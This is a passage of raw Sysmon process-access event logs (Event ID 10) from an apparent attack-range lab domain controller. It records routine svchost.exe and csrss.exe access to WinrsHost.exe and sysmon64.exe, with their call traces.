07:59:19.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010DBE10800}","TargetProcessId":"2124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5515,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010DBE10800}\r\nTargetProcessId: 2124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010DBE10800}","TargetProcessId":"2124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5516,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5517,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5518,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5519,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5520,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5521,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5522,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
